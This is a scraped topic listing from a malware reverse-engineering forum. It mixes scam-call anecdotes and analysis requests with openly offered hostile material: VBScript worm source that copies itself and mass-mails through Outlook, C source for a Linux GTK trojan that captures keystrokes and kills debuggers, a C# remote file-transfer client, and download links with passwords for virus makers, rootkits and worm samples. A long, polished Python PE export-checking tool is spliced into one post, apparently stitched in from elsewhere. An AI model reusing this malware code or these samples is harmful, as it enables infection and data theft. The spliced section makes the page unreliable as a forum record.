Malware Reverse Engineering
Debugging, disassembling and documenting interesting malware...
364 topics in this forum
-
www.support.me
by Teddy Rogers- 6 replies
- 23.9k views
Today I got a cold call from a woman claiming my computer had been playing up because I had accessed a webpage with a virus or opened SPAM with malware. Normally I put the phone down on cold calls but at the mention of a computer security issue I had to play along for a laugh to see what was up. This type of computer scam (cold call malware) is new to me. She asked me to go to Event Viewer and check the Application error logs and unsurprisingly there were a lot of errors and warnings. This is of course to legitimise the reason for the call and to justify what was to happen next. She asked me to go to www.support.me which then redirected me to https://secure.logmeinrescue.…
-
JPS VIRUS MAKER
by fahmi- 2 replies
- 15.2k views
:thumbsup: download
-
DotNetaspoilt
by sirp- 1 reply
- 10.6k views
Quote: DotNetaspoilt is a very capable code injector, making it possible to inject and edit code and GUI controls into .NET applications in an interactive fashion.
Code: http://anonym.to/?http://digitalbodyguard.com/DotNetasploit.html
Code: http://anonym.to/?http://www.woodmann.com/collaborative/tools/images/Bin_DotNetasploit_2010-8-17_3.39_dotnetasploit25.zip
and here is a pack with all the stuff
VIDS: Injector Visual Studio Exploit - no code is safe; DotNetSploit Overview; DotNetaSploit Tools: DotNetSpike; MetaSploit - Payload Deployment; Targeted Attacks; DotNetasploitEXE
PDF: Attacking .Net at Runtime; ReflectionsHiddenPower
http://anonym.to/?http://depo…
-
make virus I hate Mawanella incident
by fahmi- 0 replies
- 3.8k views
virus i hate mawanella incident
On Error Resume Next
Rem // I hate Mawanella incident
Set W_S = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr, strMsg
set wscr=CreateObject("WScript.Shell")
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set cFile = fso.GetFile(WScript.ScriptFullName)
cFile.Copy(dirsystem&"\Mawanella.vbs")
Set OutlookA = CreateObject("Outlook.Application")
If OutlookA = "Outlook" Then
Set Mapi=OutlookA.GetNameSpace("MAPI")
Set…
-
StuxNet analysis?
by deepzero- 6 replies
- 8.2k views
Hi, I am looking for a detailed Stuxnet analysis, as in: http://www.virusbtn.com/conference/vb2010/abstracts/LastMinute7.xml Couldn't find anything though. Maybe someone else was more successful?
-
C# ConnEX
by JMC31337- 2 replies
- 5.5k views
plenty of examples on the net like Chickenbutt said
//JMC31337
//ConnEX
//CLIENT
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Net;
using System.Net.Sockets;
namespace Client {
    class Program {
        static void Main(string[] args) {
            string download = "download";
            string upload = "upload";
            ASCIIEncoding ASCII = new ASCIIEncoding();
            Byte[] outstream = new Byte[99999];
            Console.WriteLine("ConnEX Admin TOOL (CLIENT) Started");
            int port = 31337;
            Console.WriteLine("Enter IP address: ");
            string servip = Console.ReadLine(…
-
- 0 replies
- 3.6k views
I have started a new blog on reverse engineering http://dreamofareverseengineer.blogspot.com/ Don't hesitate to post your comments on the blog. silent death
-
Looking for access to malware analysis
by KingChrisyLive- 6 replies
- 9.3k views
Hello everybody, A few days ago I read some very interesting articles about malware analysis and now I'm looking for papers, tutorials and documentation to get started with the matter. It'd be better if it's written for a beginner in this topic. What sort of skills are required to get started?
-
Session Hijacking
by mcanpuneet- 4 replies
- 6.8k views
You can find many tools for changing the Session ID in cookies, form-based and many more. You can do this using any proxy, HTTP debugger and many more. But you will not find any tool to decode the session ID in the cookie. In the cookie, Session IDs are normally in a form like 1600401588313630099709319853232030099705, which is an encoded representation. Can anyone help me decode this value to get the original session ID? Thanks in advance. Newbie in the security domain. Email me
-
Malware Scam Attempt
by Departure- 1 reply
- 3.9k views
I had a *removed* ring me today and it was funny, I have never had this type of scam pulled on me before... She rang up saying that there is a new infection spreading rapidly in my country (Australia) and that I could be infected. She guided me into the Event Viewer (step by step lol) and in shock she said there shouldn't be any warnings or errors in the application event viewer log. She then told me I will need to go to a site "www.virtualpcdoctor.com" and click on the remote support button, after which one of their technical support teams would remove this new infection. I told her she is ****ed in the head and that I don't believe her, she insisted that her company is a…
-
- 12 replies
- 7.6k views
Hi everybody. My boss has told me to find the binary code of Stuxnet, or any suspicious file that is Stuxnet. Does anyone have it or know where I can get it? Thanks.
-
malware causing ollydbg to crash at start
by frank_boldewin- 5 replies
- 7.2k views
Hey guys, I'm currently investigating a spear phishing malware (sorry, can't share this malware). Even with all protection plugins like the latest strongod, phant0m etc. it crashes immediately after loading the executable into ollydbg.exe. I found out that the problem is caused by illegal export directory entries of the PE file, see attachment. If I fix the "number of names" to "0", Olly loads the file without problems and unpacking works well, after bypassing several anti-dump, anti-debug ... tricks. Has anyone seen this anti-Olly trick before, and if yes, is there a plugin for it which hardens Olly against this trick? Cheers, Frank
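The crash Frank describes comes from a loader trusting the export directory's counts and pointers. As an added example (not from the post, and not an OllyDbg plugin), the Python below performs the bounds checks a hardened loader should make on IMAGE_EXPORT_DIRECTORY before walking its tables, and applies the same fix he did by hand, zeroing NumberOfNames. The PE it runs against is constructed in memory: a minimal PE32 with one .edata section and hypothetical names ("s.dll", "Foo"); the field offsets are the documented PE layout.

```python
"""Sanity-check a PE export directory before a tool walks it, and apply the fix
from the post above (NumberOfNames = 0). Added example; the test PE is constructed."""
import struct

def _u16(buf, off): return struct.unpack_from("<H", buf, off)[0]
def _u32(buf, off): return struct.unpack_from("<I", buf, off)[0]

def parse_headers(data):
    """Return (SizeOfImage, export RVA, export size, [(vaddr, size, rawptr), ...])."""
    pe = _u32(data, 0x3C)                                  # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, opt_size = _u16(data, pe + 6), _u16(data, pe + 20)
    opt = pe + 24                                          # optional header start
    is64 = _u16(data, opt) == 0x20B                        # PE32+ magic
    size_of_image = _u32(data, opt + 56)                   # same offset in PE32 and PE32+
    ndirs = _u32(data, opt + (108 if is64 else 92))        # NumberOfRvaAndSizes
    exp_rva = exp_size = 0
    if ndirs > 0:                                          # export table is directory 0
        dd = opt + (112 if is64 else 96)
        exp_rva, exp_size = _u32(data, dd), _u32(data, dd + 4)
    sections = []
    for i in range(nsec):                                  # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((vaddr, max(vsize, rawsize), rawptr))
    return size_of_image, exp_rva, exp_size, sections

def rva_to_offset(rva, sections):
    """Map an RVA to a file offset, or None when no section contains it."""
    for vaddr, size, rawptr in sections:
        if vaddr <= rva < vaddr + size:
            return rawptr + (rva - vaddr)
    return None

def check_exports(data):
    """Return a list of problems with the export directory; [] means it looks sane."""
    size_of_image, exp_rva, _, sections = parse_headers(data)
    if exp_rva == 0:
        return []                                          # no exports at all
    off = rva_to_offset(exp_rva, sections)
    if off is None or off + 40 > len(data):
        return ["export directory RVA 0x%x does not map into the file" % exp_rva]
    # IMAGE_EXPORT_DIRECTORY: NumberOfFunctions +20, NumberOfNames +24, AddressOfFunctions +28,
    # AddressOfNames +32, AddressOfNameOrdinals +36 (each 4 bytes)
    nfunc, nnames, aof, aon, aoo = struct.unpack_from("<IIIII", data, off + 20)
    problems = []
    if nnames > nfunc:                                     # more names than functions is illegal
        problems.append("NumberOfNames (%d) exceeds NumberOfFunctions (%d)" % (nnames, nfunc))
    for label, rva, count, width in (("AddressOfFunctions", aof, nfunc, 4),
                                     ("AddressOfNames", aon, nnames, 4),
                                     ("AddressOfNameOrdinals", aoo, nnames, 2)):
        end, start_off = rva + count * width, rva_to_offset(rva, sections)
        if end > size_of_image or start_off is None or (count and rva_to_offset(end - 1, sections) is None):
            problems.append("%s: %d entries at RVA 0x%x do not fit in the image" % (label, count, rva))
            continue
        if label == "AddressOfNames":                      # each name pointer must be mapped too
            for i in range(count):
                name_rva = _u32(data, start_off + 4 * i)
                if rva_to_offset(name_rva, sections) is None:
                    problems.append("name %d points at unmapped RVA 0x%x" % (i, name_rva))
    return problems

def zero_number_of_names(data):
    """Return a copy with NumberOfNames cleared, the manual fix described in the post."""
    _, exp_rva, _, sections = parse_headers(data)
    off = rva_to_offset(exp_rva, sections)
    if off is None:
        raise ValueError("export directory is not mapped")
    out = bytearray(data)
    struct.pack_into("<I", out, off + 24, 0)
    return bytes(out)

def build_sample_pe(number_of_names):
    """Constructed minimal PE32: one .edata section at RVA 0x1000 exporting one hypothetical symbol."""
    dos = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))      # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)  # i386, 1 section, 0xE0 opt hdr
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                 # PE32 magic
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)           # ImageBase, SectionAlign, FileAlign
    struct.pack_into("<II", opt, 56, 0x2000, 0x200)                      # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96, 0x1000, 0x40)                       # export directory RVA, size
    sec = bytearray(b".edata\0\0" + b"\0" * 32)
    struct.pack_into("<IIII", sec, 8, 0x200, 0x1000, 0x200, 0x200)       # vsize, vaddr, rawsize, rawptr
    hdr = dos + b"PE\0\0" + file_hdr + opt + sec
    edata = bytearray(0x200)
    struct.pack_into("<IIHHIIIIIII", edata, 0, 0, 0, 0, 0, 0x1040, 1, 1,  # Name RVA, Base, NumberOfFunctions
                     number_of_names, 0x1028, 0x102C, 0x1030)            # NumberOfNames, AOF, AON, AOO
    struct.pack_into("<IIH", edata, 0x28, 0x1010, 0x1048, 0)             # function RVA, name RVA, ordinal
    edata[0x40:0x46], edata[0x48:0x4C] = b"s.dll\0", b"Foo\0"            # hypothetical names
    return bytes(hdr + b"\0" * (0x200 - len(hdr)) + edata)

if __name__ == "__main__":
    bogus = build_sample_pe(0x7FFFFFFF)   # the sort of value that makes a trusting loader walk off the map
    for p in check_exports(bogus):
        print("BAD:", p)
    print("after zeroing NumberOfNames:", check_exports(zero_number_of_names(bogus)))
```

Run against a real sample, the checks flag the same field Frank patched: a NumberOfNames that exceeds NumberOfFunctions or whose name table does not fit inside SizeOfImage. Zeroing the count is a triage shortcut, not a repair; if the unpacked binary has to export anything, the table must be rebuilt afterwards.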
-
Zhelatin-F Worm
by JMC31337- 0 replies
- 10.4k views
Got this out of a packed Dev-C package archive. RAR password: infected. mathtest.rar
-
W32.SafeSys.Worm
by Jaymz- 1 reply
- 16.7k views
Used search on the entire forum and also this sub-section, but I didn't find anything related to the SafeSys virus... Here's a download link for it, if you want to examine it. Notice that ALL THE FILES IN THE PACKAGE ARE INFECTED! The package is password protected, so it does not do any harm to your computer... Quote: "The worm is called W32.SafeSys.Worm and attacks a particular program called Deep Freeze. Deepfreeze is a computer protection utility that prevents malicious code from writing to the hard drive itself. Any malicious code is written to a memory buffer which then gets erased upon reboot. The original hard drive data is untouched and can simply be reloaded duri…
-
TDL x64 Rootkit
by Aguila- 2 replies
- 21.7k views
Called TDL, TDSS, Alureon or Olmarik. First widely spread x64 rootkit.
Analysis:
http://www.prevx.com/blog/154/TDL-rootkit-x-goes-in-the-wild.html
http://www.prevx.com/blog/155/x-TDL-rootkit--follow-up.html
http://www.symantec.com/connect/de/blogs/tidserv-64-bit-goes-hiding
http://blog.raidrush.ws/2010/09/11/malware-analyse-tdl-rootkit-64-bit-infektion/ (German, but with TDL dropper source code)
download: http://www.xup.in/dl,15799673/TDL_x64.rar/ password: infected
-
Waledac's Anti-Debugging Tricks
by sirp- 1 reply
- 6.3k views
Even more of those nasty tricks ;) The last spreading malware version of Waledac, a notorious spamming botnet that has been taken down in a collaborative effort led by Microsoft earlier this year, contained some neat anti-debugging tricks in order to make reverse engineering more difficult. Felix Leder and I have been presenting about the approach at SIGINT 2010 in Cologne yesterday, and as the method seems to be not publicly known yet, I will quickly describe it here as well. Here's the Info
-
Skype trojan source
by sirp- 0 replies
- 4k views
Skype trojan source. The tools generally are related to the two trojan horses Minipanzer and Megapanzer (which you find at the bottom of this section) to footprint a system, collect sensitive data, malware self-defense mechanisms and so on. All source code is available under the GPL, so please do whatever legal stuff you want with it but keep the source open. I used the time over Christmas to work on the Skype trojan source code. The code was a little messy, it compiled but at some places it crashed. The old source was optimised for Skype 3 and for about a year now Skype 4 is spreading more and more. Therefore I decided to clean up the code and adapt it that way it works tog…
-
29A INC files
by CodeExplorer- 2 replies
- 7.6k views
29A INC files - virus source ASM. Link: http://vx.org.ua/29a/29a-2/29a-2.3_3
-
Find username and password
by Krisler12- 1 reply
- 3.9k views
Hi! It is a Windows virus, better say a stealer. Archive password: 123456. It is coded in Visual Basic 6 and strongly obfuscated. Try to find what the site name for sending the logs is, and the username and password for logging into the site. Good luck! test.rar
-
GTK Linux Trojan
by JMC31337- 0 replies
- 4.8k views
//gcc -lX11 -lXtst gtkthief2.c -o gtkthief2 `pkg-config --cflags --libs gtk+-2.0`
//JMC31337
//VIRAL WEAPONRY LABZ
#include <gtk/gtk.h>
#include <stdio.h>
//#include <gdk/gdkkeysyms.h>
#include <stdlib.h>
#include <X11/Xlib.h>
#include <X11/keysym.h>
#include <X11/extensions/XTest.h>
#include <string.h>
#include <linux/input.h>
#include <X11/Xutil.h>
#include <X11/Xatom.h>
#include <X11/keysymdef.h>
#include <dirent.h>
int apt=1;
//===================================
static void delete() {
    system("chmod 755 *");
    system("pkill gdb");
    struct dirent **namelist;
    int n;
    int c;
    int apt=1;
    int C4 = 4;
    …
-
Suspected Malware packed with AsPack
by NewEraCracker- 1 reply
- 6.8k views
Hello guys, Today I found this on a download. I think it's a virus and I found that it is packed with Aspack. I've sent this to Avira but if you can, please take a look (using an isolated virtual machine). Password: malware. DO THIS ONLY IF YOU ARE EXPERIENCED. I DO NOT KNOW WHAT THIS FILE IS CAPABLE OF. malware.rar
-
take a look
by blackpirate- 5 replies
- 9.8k views
Hey, I just found a link to an app, let's say very handy to have! I thought that it's too nice to be real so I scanned the file first on VirusTotal, without any positive result! Then the bad things happened: after running it, the app created multiple user accounts, locked mine (admin), deleted restore points... very nasty! Can someone debug it, to see what it's all about and if I took any risk? I had some important things on my PC! (passwords etc) PLEASE BE CAREFUL! RUN IT ON A VIRTUAL MACHINE ONLY! FILE: http://www.sendspace.com/file/w04db8 thnx in advance! BP
-
General Considerations while Reversing Malicious Software
by mcanpuneet- 0 replies
- 3.4k views
I have little experience in reversing Windows executables and DLLs using OllyDbg and some other debuggers. I want to learn malicious software reversing. What general considerations should be taken while reversing any malicious software? Any help will be appreciated. Thanks in advance
-
CSI Internet - Malware analysis series
by frank_boldewin- 0 replies
- 3.7k views
Hi all, for anyone interested in malware analysis, here are the links to all 5 parts of our CSI Internet series.
part1: malicious javascript http://www.h-online.com/security/features/CSI-Internet-Alarm-at-the-pizza-service-1019940.html?view=print
part2: malicious msoffice http://www.h-online.com/security/features/CSI-Internet-The-image-of-death-1030311.html?view=print
part3: malicious pdf http://www.h-online.com/security/features/CSI-Internet-PDF-timebomb-1038864.html?view=print
part4: malicious flash (integer overflow analysis) http://www.h-online.com/security/features/CSI-Internet-Attack-of-the-killer-videos-1049197.html?view=print
part5: malicious f…
-
Malware sample for practice
by GEEK- 13 replies
- 8.8k views
Hey, found this on my USB so I am guessing it's not a very dangerous virus. I have sent it to any online AV checkers simply because I am not bothered. If anyone wants to practice, I have zipped the unedited binaries. Password: infected. usb_malware_sample.rar